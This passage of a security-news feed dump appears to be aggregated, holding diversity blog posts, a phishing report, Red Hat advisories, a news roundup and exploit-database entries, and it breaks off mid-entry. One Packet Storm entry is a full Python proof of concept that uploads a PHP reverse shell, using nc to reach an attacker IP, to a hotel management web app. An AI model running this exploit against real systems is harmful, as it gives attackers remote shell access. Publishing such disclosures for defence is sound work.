According to Julie Brill, Microsoft\u2019s Chief Privacy Officer, women early in their careers or changing roles mid-career may underestimate their qualifications, in part because the industry may be sending the wrong message to women on the value they can add to an organization even in the early stages of their careers.\n\n> \u201cTalent comes from many places and doesn\u2019t require a decade of prior experience. Women who are earlier in their careers are more likely to be digital natives and facile with technology. This tech-savvy generation brings critical insight into how we can approach user-centric privacy features across our products. Enthusiastic women professionals can add value to the diverse teams that are working quickly to address the constantly changing cybersecurity and privacy landscape. We will always need innovative thinkers at any stage of their career who are passionate about the impact they can make for the tech industry and society overall. There is so much opportunity to pursue a career in privacy and cybersecurity, and there is plenty of work to be done.\u201d\u2014Julie Brill, Chief Privacy Officer at Microsoft\n\nGiven the potential, Microsoft Security is paving the way by sponsoring the cybersecurity programs listed above. We believe it is important to educate middle school and high school students about these opportunities, coach them, and give them career guidance in addition to teaching security fundamentals. In the future, we will also collaborate with and sponsor [Girl Security](<https://www.girlsecurity.org/>) on a fellowship program to provide career education and mentoring to people with diverse backgrounds\u2014enabling security to benefit all.\n\n### 4\\. Help candidates counter self-doubt\n\nImposter syndrome is common: candidates entering highly skilled fields often feel self-doubt and insecurity, and may feel undeserving of their role. 
Help set the right tone from the outset by reassuring them that they don\u2019t need a perfect set of qualifications or an ideal background to become an amazing security engineer or cybercrime investigator.\n\nNo one was born with security knowledge and experience. People learn as they go along. As we\u2019ve heard from Kristina in the CISO Spotlight Episode, people of all different backgrounds make good security professionals.\n\n## Support women in cybersecurity\n\nThe work to develop programs and practices that attract and retain women in the field of cybersecurity is ongoing and moves as quickly as the field changes. In April, Microsoft Security is kicking off the [Girl Security](<https://www.girlsecurity.org/>) Fellowship program, a series of webcasts and training sessions that lead into the summer sharing inspiring stories from many of our women cybersecurity leaders and helping high school students learn security fundamentals along with mentorships. More information on the Microsoft and Girl Security program will be mentioned in a subsequent blog post later in March.\n\nBy embracing cybersecurity for all, we can both expand women\u2019s options in the workforce and more effectively secure companies against threats. Stay tuned for more blogs this month featuring our women leaders in Cybersecurity. Happy International Women\u2019s Day!\n\nTo learn more about Microsoft Security solutions, [visit our website](<https://www.microsoft.com/en-us/security/business/solutions>). Bookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. 
Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nOther blogs to reference:\n\n * [CISO Spotlight: How diversity of data (and people) defeats today\u2019s cyber threats](<https://www.microsoft.com/security/blog/2020/10/20/ciso-spotlight-how-diversity-of-data-and-people-defeats-todays-cyber-threats/>).\n * [Microsoft Security: How to cultivate a diverse cybersecurity team](<https://www.microsoft.com/security/blog/2020/08/31/microsoft-security-cultivate-diverse-cybersecurity-team/>).\n * [New data from Microsoft shows how the pandemic is accelerating the digital transformation of cyber-security](<https://www.microsoft.com/security/blog/2020/08/19/microsoft-shows-pandemic-accelerating-transformation-cyber-security/>).\n * [Exploiting a crisis: How cybercriminals behaved during the outbreak](<https://www.microsoft.com/security/blog/2020/06/16/exploiting-a-crisis-how-cybercriminals-behaved-during-the-outbreak/>).\n\nThe post [International Women\u2019s Day: How to support and grow women in cybersecurity](<https://www.microsoft.com/security/blog/2021/03/08/international-womens-day-how-to-support-and-grow-women-in-cybersecurity/>) appeared first on [Microsoft Security.", "modified": "2021-03-08T18:00:43", "published": "2021-03-08T18:00:43", "id": "MMPC:ECDE1A8DFB45A1210B46BCEB4EA6E96C", "href": "https://www.microsoft.com/security/blog/2021/03/08/international-womens-day-how-to-support-and-grow-women-in-cybersecurity/", "type": "mmpc", "title": "International Women\u2019s Day: How to support and grow women in cybersecurity", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2021-03-08T17:23:49", "bulletinFamily": "info", "cvelist": [], "description": "Microsoft users are being targeted with thousands of phishing emails, in an ongoing attack aiming to steal their Office 365 credentials. 
The attackers add an air of legitimacy to the campaign by leveraging a fake Google reCAPTCHA system and top-level domain landing pages that include the logos of victims\u2019 companies.\n\nAccording to researchers, at least 2,500 such emails have been unsuccessfully sent to senior-level employees in the banking and IT sector, over the past three months. The emails first take recipients to a fake Google reCAPTCHA system page. [Google reCAPTCHA is a service](<https://threatpost.com/cloudflare-axes-google-recaptcha-due-to-privacy-price/154635/>) that helps protect websites from spam and abuse, by using a Turing test to tell humans and bots apart (through asking a user to click on a fire hydrant out of a series of images, for instance).\n\nOnce victims \u201cpass\u201d the reCAPTCHA test, they are then redirected to a phishing landing page, which asks for their Office 365 credentials.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe attack is notable for its targeted aim at senior business leaders with titles such as Vice President and Managing Director who are likely to have a higher degree of access to sensitive company data,\u201d said researchers with Zscaler\u2019s ThreatLabZ security research team [on Friday](<https://www.zscaler.com/blogs/security-research/microsoft-themed-phishing-attack-targets-executives-using-fake-google>). \u201cThe aim of these campaigns is to steal these victims\u2019 login credentials to allow threat actors access to valuable company assets.\u201d\n\n## **Fake Phishing Emails: Voicemail Attachments**\n\nThe phishing emails pretend to be automated emails from victims\u2019 unified communications tools, which say that they have a voicemail attachment. 
For instance, one email tells users that \u201c(503) ***-6719 has left you a message 35 second(s) long on Jan 20\u201d along with a lone attachment that\u2019s titled \u201cvmail-219.HTM.\u201d Another tells email recipients to \u201cREVIEW SECURE DOCUMENT.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/08111659/phishing-attack-microsoft-1.jpg>)\n\nThe phishing email sample. Credit: Zscaler\n\nWhen the victims click on the attachment, they then encounter the fake Google reCAPTCHA screen, which contains a typical reCAPTCHA box \u2013 featuring a checkbox that the user must click that says \u201cI\u2019m not a robot,\u201d which then triggers the Turing test.\n\nAfter filling out the fake reCAPTCHA system, victims are then directed to what appears to be a Microsoft login screen. The login pages also contain different logos from the companies the victims work for \u2013 such as one containing a logo from software company ScienceLogic and another from office rental company BizSpace. This reveals that attackers have done their homework and are customizing their phishing landing pages to fit their victims\u2019 profile, in order to make the attack appear more legitimate.\n\nVictims are asked to input their credentials into the system; once they do so, a message tells them that the validation was \u201csuccessful\u201d and that they are being redirected.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/08111741/phishing-attack-microsoft-2.jpg>)\n\nThe phishing landing page mimics Microsoft\u2019s login page. Credit: Zscaler\n\n\u201cAfter giving the login credentials, the phishing campaign will show a fake message that says \u2018Validation successful,'\u201d said researchers. 
\u201cUsers are then shown a recording of a voicemail message that they can play, allowing threat actors to avoid suspicion.\u201d\n\nResearchers found a variety of phishing pages associated with the campaign, which were hosted using generic top level domains such as .xyz, .club and .online. These top level domains are typically utilized by cybercriminals in spam and phishing attacks. That\u2019s because [they can be purchased for less than $1 each](<https://blog.f-secure.com/why-is-theres-so-much-spam-coming-from-xyz-and-other-new-top-level-domains/>) \u2013 a low price for adding a level of believability to phishing campaigns.\n\n## **More Phishing Attacks on Fake Google reCAPTCHA Tactic**\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/08111903/phishing-attack-microsoft-3.jpg>)\n\nCredit: Zscaler\n\nAdversaries have been leveraging bogus reCAPTCHA systems in their attacks for years. For instance, in 2019[, a malware campaign targeted a Polish bank and its users](<https://threatpost.com/phishing-scam-malware-google-recaptcha/142142/>) with emails containing a link to a malicious PHP file, which eventually downloaded the BankBot malware onto victims\u2019 systems. 
The attackers used a fake Google reCAPTCHA system to seem more realistic.\n\nAnother phishing attack in February purported to be sent from a voicemail service and contained a link to play the voice message \u201cPlay Audi Date.wav,\u201d [eventually redirecting victims to a malicious site](<https://threatpost.com/malformed-url-prefix-phishing-attacks-spike-6000/164132/>) with a reCAPTCHA message.\n\nBoth of the above examples show that reCAPTCHA continues to be used in phishing attacks, as the tactic successfully adds legitimacy to the attack: \u201cSimilar phishing campaigns utilizing fake Google reCAPTCHAs have been observed for several years, but this specific campaign targeting executives across specific industry verticals started in December 2020,\u201d noted researchers.\n\nMicrosoft Office 365 users have faced several sophisticated phishing attacks and scams over the past few months. In October, [researchers warned of a phishing campaign](<https://threatpost.com/microsoft-teams-phishing-office-365/160458/>) that pretends to be an automated message from Microsoft Teams. In reality, the attack aimed to steal Office 365 recipients\u2019 login credentials. Also in October, [an Office365 credential-phishing attack](<https://threatpost.com/microsoft-office-365-captchas/159747/>) targeted the hospitality industry, using visual CAPTCHAs to avoid detection and appear legitimate. 
Phishing attackers have also adopted new tactics like [Google Translate](<https://threatpost.com/clever-phishing-attack-enlists-google-translate-to-spoof-facebook-login-page/141571/>) or [custom fonts](<https://threatpost.com/phishing-custom-fonts/140563/>) to make the scams seem more legitimate.\n\n**_Check out our free _****_[upcoming live webinar events](<https://threatpost.com/category/webinars/>)_****_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_** \n\u00b7 March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly** ([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>)) \n\u00b7 April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "modified": "2021-03-08T17:04:59", "published": "2021-03-08T17:04:59", "id": "THREATPOST:28181170BDA0015C27570F94BA246B3F", "href": "https://threatpost.com/google-recaptcha-phishing-office-365/164566/", "type": "threatpost", "title": "Fake Google reCAPTCHA Phishing Attack Swipes Office 365 Passwords", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2021-03-08T10:37:58", "bulletinFamily": "unix", "cvelist": ["CVE-2021-22883", "CVE-2021-22884"], "description": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. 
\n\nThe following packages have been upgraded to a later upstream version: nodejs (14.16.0).\n\nSecurity Fix(es):\n\n* nodejs: HTTP2 'unknownProtocol' cause DoS by resource exhaustion (CVE-2021-22883)\n\n* nodejs: DNS rebinding in --inspect (CVE-2021-22884)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* Node.js should not be built with \"--debug-nghttp2\" (BZ#1932427)", "modified": "2021-03-08T15:22:20", "published": "2021-03-08T14:55:44", "id": "RHSA-2021:0744", "href": "https://access.redhat.com/errata/RHSA-2021:0744", "type": "redhat", "title": "(RHSA-2021:0744) Important: nodejs:14 security and bug fix update", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-08T10:38:14", "bulletinFamily": "unix", "cvelist": ["CVE-2020-35517"], "description": "The Advanced Virtualization module provides the user-space component for running virtual machines that use KVM in environments managed by Red Hat products.\n\nSecurity Fix(es):\n\n* QEMU: virtiofsd: potential privileged host device access from guest (CVE-2020-35517)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-03-08T15:05:19", "published": "2021-03-08T14:26:12", "id": "RHSA-2021:0743", "href": "https://access.redhat.com/errata/RHSA-2021:0743", "type": "redhat", "title": "(RHSA-2021:0743) Important: virt:8.2 and virt-devel:8.2 security update", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-08T10:37:21", "bulletinFamily": "unix", "cvelist": ["CVE-2021-22883", "CVE-2021-22884"], "description": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. 
\n\nThe following packages have been upgraded to a later upstream version: nodejs (10.24.0).\n\nSecurity Fix(es):\n\n* nodejs: HTTP2 'unknownProtocol' cause DoS by resource exhaustion (CVE-2021-22883)\n\n* nodejs: DNS rebinding in --inspect (CVE-2021-22884)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-03-08T15:07:58", "published": "2021-03-08T14:16:17", "id": "RHSA-2021:0741", "href": "https://access.redhat.com/errata/RHSA-2021:0741", "type": "redhat", "title": "(RHSA-2021:0741) Important: nodejs:10 security update", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-08T10:37:13", "bulletinFamily": "unix", "cvelist": ["CVE-2021-22883", "CVE-2021-22884"], "description": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. \n\nThe following packages have been upgraded to a later upstream version: nodejs (12.21.0).\n\nSecurity Fix(es):\n\n* nodejs: HTTP2 'unknownProtocol' cause DoS by resource exhaustion (CVE-2021-22883)\n\n* nodejs: DNS rebinding in --inspect (CVE-2021-22884)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-03-08T15:14:11", "published": "2021-03-08T14:16:09", "id": "RHSA-2021:0740", "href": "https://access.redhat.com/errata/RHSA-2021:0740", "type": "redhat", "title": "(RHSA-2021:0740) Important: nodejs:12 security update", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-08T10:38:22", "bulletinFamily": "unix", "cvelist": ["CVE-2021-22883", "CVE-2021-22884"], "description": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. 
\n\nThe following packages have been upgraded to a later upstream version: nodejs (12.21.0).\n\nSecurity Fix(es):\n\n* nodejs: HTTP2 'unknownProtocol' cause DoS by resource exhaustion (CVE-2021-22883)\n\n* nodejs: DNS rebinding in --inspect (CVE-2021-22884)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-03-08T14:53:45", "published": "2021-03-08T14:15:59", "id": "RHSA-2021:0739", "href": "https://access.redhat.com/errata/RHSA-2021:0739", "type": "redhat", "title": "(RHSA-2021:0739) Important: nodejs:12 security update", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-08T10:38:10", "bulletinFamily": "unix", "cvelist": ["CVE-2021-22883", "CVE-2021-22884"], "description": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. \n\nThe following packages have been upgraded to a later upstream version: nodejs (10.24.0).\n\nSecurity Fix(es):\n\n* nodejs: HTTP2 'unknownProtocol' cause DoS by resource exhaustion (CVE-2021-22883)\n\n* nodejs: DNS rebinding in --inspect (CVE-2021-22884)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-03-08T15:07:46", "published": "2021-03-08T14:15:50", "id": "RHSA-2021:0738", "href": "https://access.redhat.com/errata/RHSA-2021:0738", "type": "redhat", "title": "(RHSA-2021:0738) Important: nodejs:10 security update", "cvss": {"score": 0.0, "vector": "NONE"}}], "carbonblack": [{"lastseen": "2021-03-08T14:51:49", "bulletinFamily": "blog", "cvelist": [], "description": "_This post is part of our Women\u2019s History Month series - follow along with us on Twitter _[_@VMwareCarbonBlack _](<https://twitter.com/vmw_carbonblack>)_ 
_\n\nIn celebration of International Women\u2019s Day, we are excited to kick off our [six-part Women in Security series](<https://www.carbonblack.com/blog/women-in-security-celebrating-womens-history-month/>). Throughout March, we will highlight outstanding women on the VMware Security Business Unit team as well as customers who are making their mark on the security industry and helping to keep the world safe from cyberattacks.\n\n\n\nMeet [Taree Reardon, Senior Threat Analyst](<https://www.carbonblack.com/howlers-security-experts/taree-reardon/>), VMware Security Business Unit**.** As a GIAC certified Incident Handler with over three years of experience on the VMware Security Business Unit Managed Detection team, Taree is responsible for identifying and dissecting new and emerging threats. She is an active speaker in the cybersecurity industry and a member of the [Howlers](<https://www.carbonblack.com/howlers-security-experts/>), where she shares her experiences and helps the security community succeed. Taree also has a passion for mentoring and empowering the next generation of security professionals. We spoke to her about her career path, role models, and tips for other women looking to succeed in the security industry._ _\n\n**Tell us about yourself and your role at VMware? \n**I joined Carbon Black prior to the acquisition by VMware. I\u2019m on the threat analysis team and responsible for identifying emerging threats to protect our customers against emerging cyberattacks. I work on a team of experts who come from different backgrounds - they\u2019ve often held two or three different types of jobs before this one - which brings creativity and unique perspectives to the table.\n\n**How did you land a career in security and what led you to VMware Security Business Unit? \n**I knew that Carbon Black was a really inclusive place to work. I was looking for a company that was pushing women up vs. down and I found exactly that. 
While it was a two-month process with more than eight interviews, it was worth it. I had the chance to speak with my potential teammates and understand their priorities and values, which got me even more excited about the role. Post-acquisition by VMware, I\u2019m glad to see the culture and values remain the same. VMware has a very similar approach to lifting women up and I\u2019m constantly seeing new initiatives from leadership to push these efforts forward.\n\n**We know there are no typical days in security, but can you tell us about what a day entails in the VMware Security Business Unit for you? \n**You never know what you\u2019re going to do on a given day - I love this about security and it\u2019s what keeps me engaged in my job. On incident days, our first priority is protecting our customers of course. But on non-incident days, we focus on how our team is doing and discuss areas for personal and professional growth. I always love being able to take a step back and think about my team\u2019s well-being and our path forward together. As leaders on the team, we provide resources, new trainings, and opportunities so they consistently feel challenged and can grow their security expertise.\n\n**Who is your role model in tech or security? \n**I love everything Michelle Obama stands for, especially about female empowerment and breaking glass ceilings. In security though, I love following [@malwareunicorn](<https://twitter.com/malwareunicorn?lang=en>) and [@hacks4pancakes](<https://twitter.com/hacks4pancakes?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) - they both post engaging content, and they\u2019re so personable. I know I can go to them as a knowledgeable resource and as people who can answer important security questions.\n\n**What excites you most about security and the future of security at VMware? \n**I think we\u2019re at such an exciting, pivotal time in security. 
I look at security as a warfront - there are attackers and we\u2019re defending against them. I feel privileged to be on the \u201cfront lines\u201d helping important industries like healthcare prepare for and stop attacks, especially with the increase in ransomware attacks over the past year. I\u2019m proud to say we can make a difference, and even save lives in the case of the recent surge of attacks on the healthcare industry.\n\n**In honor of Women\u2019s History Month, what advice do you have for women looking to get into the security industry?**\n\n * Imposter syndrome is normal - you may second-guess yourself, but don\u2019t worry, everyone feels that way, not just women. It\u2019s normal and talking about it helps. I always talk through any insecurities or challenges I\u2019m facing with management and look at the opportunity as one to learn something new.\n * When you\u2019re interviewing, ask to speak to women on the team. Ask them about their role, and if they feel supported and challenged. It\u2019s critical to vet the place you\u2019re interviewing beforehand. Once you take the job, if it\u2019s not working out, then give it some time, learn what you can and move on. Just be sure you put yourself and your growth first.\n * Connect with women in the industry - it\u2019s great if you get a woman to mentor you, but otherwise, network on LinkedIn, ask questions, and speak to other women in the industry.\n * Don't try to do it all. There\u2019s an immense amount of pressure on women to not only do their job well, but also to keep things at home and with their children organized. 
If you have the ability, ask for help because we don\u2019t have to do it all.\n\nStay tuned for more Q&As throughout Women's History Month, and be sure to follow the #WomensHistoryMonth and #ChooseToChallenge conversations on Twitter: [@vmw_carbonblack](<https://twitter.com/vmw_carbonblack>).\n\nThe post [Women in Security Part 1: Meet Taree Reardon, Senior Threat Analyst](<https://www.carbonblack.com/blog/women-in-security-part-1-meet-taree-reardon-senior-threat-analyst/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "modified": "2021-03-08T14:00:40", "published": "2021-03-08T14:00:40", "id": "CARBONBLACK:6F77F7E691DCBBE9A0FCA94ADB6D9E3F", "href": "https://www.carbonblack.com/blog/women-in-security-part-1-meet-taree-reardon-senior-threat-analyst/", "type": "carbonblack", "title": "Women in Security Part 1: Meet Taree Reardon, Senior Threat Analyst", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2021-03-08T14:50:10", "bulletinFamily": "blog", "cvelist": [], "description": "Last week on Malwarebytes Labs, our podcast featured Eva Galperin who talked to us about [defending online anonymity and speech](<https://blog.malwarebytes.com/podcast/2021/03/defending-online-anonymity-and-speech-with-eva-galperin-lock-and-code-s02e03/>).\n\nWe wrote about how [Ryuk ransomware has developed a worm-like capability](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/ryuk-ransomware-develops-worm-like-capability/>), how [Exchange servers are attacked by Hafnium zero-days](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>), [21 million free VPN users\u2019 data was exposed](<https://blog.malwarebytes.com/cybercrime/privacy/2021/03/21-million-free-vpn-users-data-exposed/>), how [China\u2019s RedEcho was accused of targeting India\u2019s power 
grids](<https://blog.malwarebytes.com/vital-infrastructure/2021/03/chinas-redecho-accused-of-targeting-indias-power-grids/>), whether [Google\u2019s Privacy Sandbox will take the bite out of tracking cookies](<https://blog.malwarebytes.com/privacy-2/2021/03/will-googles-privacy-sandbox-take-the-bite-out-of-tracking-cookies/>), and how a [Chrome fix patches an in-the-wild zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/update-now-chrome-fix-patches-in-the-wild-zero-day/>).\n\n### Other cybersecurity news\n\n * [Gab](<https://www.wired.com/story/gab-hack-data-breach-ddosecrets/>) has been badly hacked; the stolen information includes what appears to be passwords and private communications. (Source: Wired)\n * A bug in a [shared SDK](<https://www.zdnet.com/article/bug-in-shared-sdk-can-let-attackers-join-calls-undetected-across-multiple-apps/>) can let attackers join calls undetected across multiple apps. (Source: ZDNet)\n * [Business email compromise (BEC)](<https://www.bleepingcomputer.com/news/security/investors-are-the-next-target-of-large-scale-cyberattacks/>) scammers are utilizing a new type of attack targeting investors. (Source: BleepingComputer)\n * Socially engineered attacks surfaced in [maritime](<https://cimsec.org/perils-of-a-new-dimension-socially-engineered-attacks-in-maritime-cybersecurity/>) cybersecurity. (Source: Center for International Maritime Security)\n * Researchers found three new malware strains used by the [SolarWinds](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) group. (Source: The Hacker News)\n * [Horticulture](<https://www.hortidaily.com/article/9299175/horticulture-is-an-interesting-sector-for-hackers/>) is an interesting sector for hackers since it is at the forefront of modern technologies. 
(Source: Horti Daily)\n * A federal judge has approved a $650m settlement of a privacy lawsuit against [Facebook](<https://www.theguardian.com/technology/2021/feb/27/facebook-illinois-privacy-lawsuit-settlement>) for allegedly using photo face-tagging and other biometric data without the permission of its users. (Source: The Guardian)\n * [Google](<https://www.bleepingcomputer.com/news/security/google-shares-poc-exploit-for-critical-windows-10-graphics-rce-bug/>) shared a PoC exploit for a critical Windows 10 Graphics RCE bug. (Source: Bleeping Computer)\n\nStay safe, everyone!\n\nThe post [A week in security (March 1 - 7)](<https://blog.malwarebytes.com/a-week-in-security/2021/03/a-week-in-security-march-1-7/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2021-03-08T13:04:31", "published": "2021-03-08T13:04:31", "id": "MALWAREBYTES:61F80B068F99447C4142FC69BDF312D1", "href": "https://blog.malwarebytes.com/a-week-in-security/2021/03/a-week-in-security-march-1-7/", "type": "malwarebytes", "title": "A week in security (March 1 \u2013 7)", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2021-03-08T08:27:47", "description": "", "published": "2021-03-08T00:00:00", "type": "exploitdb", "title": "Print Job Accounting 4.4.10 - 'OkiJaSvc' Unquoted Service Path", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-03-08T00:00:00", "id": "EDB-ID:49623", "href": "https://www.exploit-db.com/exploits/49623", "sourceData": "# Exploit Title: Print Job Accounting 4.4.10 - 'OkiJaSvc' Unquoted Service Path\r\n# Discovery by: Brian Rodriguez\r\n# Date: 07-03-2021\r\n# Vendor Homepage: https://www.oki.com\r\n# Software Links: https://www.oki.com/mx/printing/support/drivers-and-utilities/?id=46229002&tab=drivers-and-utilities&productCategory=monochrome&sku=62442301&os=ab4&lang=ac6\r\n# Tested Version: 4.4.10\r\n# Vulnerability Type: Unquoted Service Path\r\n# Tested on: Windows 8.1 Pro 64 
bits\r\n\r\nC:\\Windows\\system32>wmic service get name, displayname, pathname, startmode | findstr /i \"Auto\" | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v \"\"\"\r\nOKI Local Port Manager              OpLclSrv    C:\\Program Files\\Okidata\\Common\\Extend3\\portmgrsrv.exe\r\nPrint Job Accounting                OkiJaSvc    C:\\Program Files\\Okidata\\Print Job Accounting\\oklogsvc.exe\r\nPrint Job Accounting Watch Service  OkiWchSvc   C:\\Program Files\\Okidata\\Print Job Accounting\\okwchsvc.exe\r\nPrint Job Accounting opja0004       opja0004    C:\\Program Files\\Okidata\\Print Job Accounting\\opja0004.exe\r\n\r\nC:\\Windows\\system32>sc qc OkiJaSvc\r\n[SC] QueryServiceConfig SUCCESS\r\n\r\nSERVICE_NAME: OkiJaSvc\r\n        TYPE               : 10  WIN32_OWN_PROCESS\r\n        START_TYPE         : 2   AUTO_START\r\n        ERROR_CONTROL      : 1   NORMAL\r\n        BINARY_PATH_NAME   : C:\\Program Files\\Okidata\\Print Job Accounting\\oklogsvc.exe\r\n        LOAD_ORDER_GROUP   :\r\n        TAG                : 0\r\n        DISPLAY_NAME       : Print Job Accounting\r\n        DEPENDENCIES       :\r\n        SERVICE_START_NAME : LocalSystem", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49623"}, {"lastseen": "2021-03-08T08:27:47", "description": "", "published": "2021-03-08T00:00:00", "type": "exploitdb", "title": "Pingzapper 2.3.1 - 'PingzapperSvc' Unquoted Service Path", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-03-08T00:00:00", "id": "EDB-ID:49626", "href": "https://www.exploit-db.com/exploits/49626", "sourceData": "# Exploit Title: Pingzapper 2.3.1 - 'PingzapperSvc' Unquoted Service Path\r\n# Discovery by: Brian Rodriguez\r\n# Date: 07-03-2021\r\n# Vendor Homepage: https://pingzapper.com\r\n# Software Links: https://pingzapper.com/download\r\n# Tested Version: 2.3.1\r\n# Vulnerability Type: Unquoted Service Path\r\n# Tested on: Windows 8.1 Pro 64 bits\r\n\r\n# Steps to discover the unquoted service path:\r\n\r\nC:\\>wmic service get name,displayname,pathname,startmode | findstr /i \"auto\" | findstr /i /v \"c:\\windows\\\\\" | findstr /i /v \"\"\"\r\nPingzapper Service  PingzapperSvc  C:\\Program Files (x86)\\Pingzapper\\PZService.exe  Auto\r\n\r\nC:\\>sc qc PingzapperSvc\r\n[SC] QueryServiceConfig SUCCESS\r\n\r\nSERVICE_NAME: PingzapperSvc\r\n        TYPE               : 10  WIN32_OWN_PROCESS\r\n        START_TYPE         : 2   AUTO_START\r\n        ERROR_CONTROL      : 1   NORMAL\r\n        BINARY_PATH_NAME   : C:\\Program Files (x86)\\Pingzapper\\PZService.exe\r\n        LOAD_ORDER_GROUP   :\r\n        TAG                : 0\r\n        DISPLAY_NAME       : Pingzapper Service\r\n        DEPENDENCIES       :\r\n        SERVICE_START_NAME : LocalSystem", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49626"}], "packetstorm": [{"lastseen": "2021-03-08T16:21:42", "description": "", "published": "2021-03-08T00:00:00", "type": "packetstorm", "title": "Hotel And Lodge Management System 1.0 Shell Upload", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-03-08T00:00:00", "id": "PACKETSTORM:161687", "href": "https://packetstormsecurity.com/files/161687/Hotel-And-Lodge-Management-System-1.0-Shell-Upload.html", "sourceData": "`# Exploit Title: Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated) \n# Date: 07-03-2021 \n# Exploit Author: Christian Vierschilling \n# Vendor Homepage: https://www.sourcecodester.com \n# Software Link: https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html \n# Version: 1.0 \n# Tested on: PHP 7.4.14, Linux x64_x86 \n \n# --- Description --- # \n \n# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. \n# Executing this script against a target might return a reverse php shell. 
\n \n# --- Proof of concept --- # \n \n#!/usr/bin/python3 \nimport random \nimport sys \nimport requests \nfrom requests_toolbelt.multipart.encoder import MultipartEncoder \n \ndef file_upload(target_ip, attacker_ip, attacker_port): \n    # Post a PHP reverse shell as the profile image; the application does not validate the upload \n    print(\"(+) Setting up reverse shell php file ..\") \n    random_file_name = str(random.randint(100000, 999999)) + \"revshell.php\" \n    revshell_string = '<?php exec(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f\"); ?>'.format(attacker_ip, attacker_port) \n    m = MultipartEncoder(fields={'image': (random_file_name, revshell_string, 'application/x-php'), 'btn_update': ''}) \n    print(\"(+) Trying to upload it ..\") \n    requests.post('http://{}/hotel/source code/profile.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type}) \n    # Confirm the upload by looking for the file name in the upload directory listing \n    r2 = requests.get('http://{}/hotel/source code/uploadImage/Profile/'.format(target_ip)) \n    if random_file_name in r2.text: \n        print(\"(+) File upload seems to have been successful!\") \n        return random_file_name \n    print(\"(-) Oh noes, file upload failed .. quitting!\") \n    sys.exit(1) \n \ndef trigger_shell(target_ip, random_file_name): \n    # Requesting the uploaded file makes the web server execute it \n    print(\"(+) Now trying to trigger our shell..\") \n    requests.get('http://{}/hotel/source code/uploadImage/Profile/{}'.format(target_ip, random_file_name)) \n \ndef main(): \n    if len(sys.argv) != 4: \n        print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0]) \n        print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0]) \n        sys.exit(-1) \n \n    target_ip = sys.argv[1] \n    attacker_ip = sys.argv[2] \n    attacker_port = sys.argv[3] \n \n    revshell_file_name = file_upload(target_ip, attacker_ip, attacker_port) \n    trigger_shell(target_ip, revshell_file_name) \n    print(\"\\n(+) done!\") \n \nif __name__ == \"__main__\": \n    main() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161687/htms10-exec.txt"}, {"lastseen": "2021-03-08T16:21:39", "description": "", "published": "2021-03-08T00:00:00", "type": "packetstorm", "title": 